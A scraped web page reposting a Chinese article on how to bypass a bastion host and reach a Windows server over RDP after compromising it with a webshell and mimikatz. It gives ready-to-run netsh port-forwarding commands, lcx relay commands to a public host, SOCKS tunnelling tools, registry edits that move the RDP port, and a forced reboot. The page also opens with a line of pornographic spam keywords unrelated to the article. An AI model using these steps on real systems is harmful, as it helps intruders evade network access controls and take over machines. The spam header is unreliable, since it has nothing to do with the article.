日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何繞過堡壘機遠程登錄

本文轉載自微信公眾號「Bypass」,作者Bypass 。轉載本文請聯(lián)系Bypass公眾號。

創(chuàng)新互聯(lián)總部坐落于成都市區(qū),致力網(wǎng)站建設服務有成都做網(wǎng)站、網(wǎng)站設計、外貿營銷網(wǎng)站建設、網(wǎng)絡營銷策劃、網(wǎng)頁設計、網(wǎng)站維護、公眾號搭建、微信小程序、軟件開發(fā)等為企業(yè)提供一整套的信息化建設解決方案。創(chuàng)造真正意義上的網(wǎng)站建設,為互聯(lián)網(wǎng)品牌在互動行銷領域創(chuàng)造價值而不懈努力!

假設一個場景:在Webshell中執(zhí)行mimikatz獲取到win管理員密碼,并且本地查看端口3389是開放的,可是從當前跳板機無法遠程到目標機器。因為某個特定需求,一定要遠程登錄到這臺win服務器,這時該怎么辦?

首先我們先分析一下這個場景,端口開放卻無法連接,最有可能的情況,就是到達目標網(wǎng)段受到ACL策略限制,只允許通過特定網(wǎng)段登錄,比如說堡壘機。大多數(shù)堡壘機部署時,為了不改變現(xiàn)有的網(wǎng)絡拓撲結構,采用旁路部署的方案,通過ACL策略限制用戶訪問特定端口。

那么,我們就可以用另一種方式來描述這個問題:目標服務器遠程端口受到ACL限制,但其他端口沒有限制,那么,最簡單的解決方式就可以通過端口轉發(fā)來繞過。

1、使用netsh命令進行端口轉發(fā)

Windows自帶的netshnetsh實現(xiàn)端口轉發(fā),監(jiān)聽12345端口,轉發(fā)到本地3389端口,可繞過訪問策略限制。

 
 
 
    
  
  
  
  1. #A、3389端口轉發(fā)到12345端口
    2. 
  
  
  
  2. netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389
    3. 
  
  
  
  3. 
  
  
  
  4. #B、查看配置好的端口映射清單
    5. 
  
  
  
  5. C:\Windows\system32>netsh interface portproxy show v4tov4
    6. 
  
  
  
  6. 
  
  
  
  7. 偵聽 ipv4:                 連接到 ipv4:
    8. 
  
  
  
  8. 
  
  
  
  9. 地址            端口        地址            端口
    10. 
  
  
  
  10. --------------- ----------  --------------- ----------
    11. 
  
  
  
  11. 192.168.126.32  12345       192.168.126.32  3389
    12.

這樣一來,通過攻擊機跳板機直接遠程目標機器的12345端口,就可以實現(xiàn)遠程登錄。

2、LCX 端口轉發(fā)

在目標機器上執(zhí)行:lcx.exe -slave 公網(wǎng)ip 51 內網(wǎng)ip 3389

在公網(wǎng)的機器執(zhí)行:Lcx.exe –listen 51 3340

本地機器上連接 127.0.0.1:3340,即可連接上目標機器的3389。

3、內網(wǎng)穿透工具

SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等

通過利用SOCKS協(xié)議,結合Proxifier使用,可實現(xiàn)mstsc登錄目標主機。

4、修改Windows遠程桌面端口

通過修改Windows默認遠程桌面端口,從而繞過ACL策略訪問限制。

修改注冊表,命令如下:

 
 
 
    
  
  
  
  1. REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 12345/f
    2. 
  
  
  
  2. REG ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f
    3.

強制重啟目標服務器后,注冊表生效。

 
 
 
    
  
  
  
  1. shutdown -r -t 0
    2.

此時,就可以遠程目標服務器的12345登錄。


標題名稱:如何繞過堡壘機遠程登錄
文章源于:http://www.5511xx.com/article/cdpjgoo.html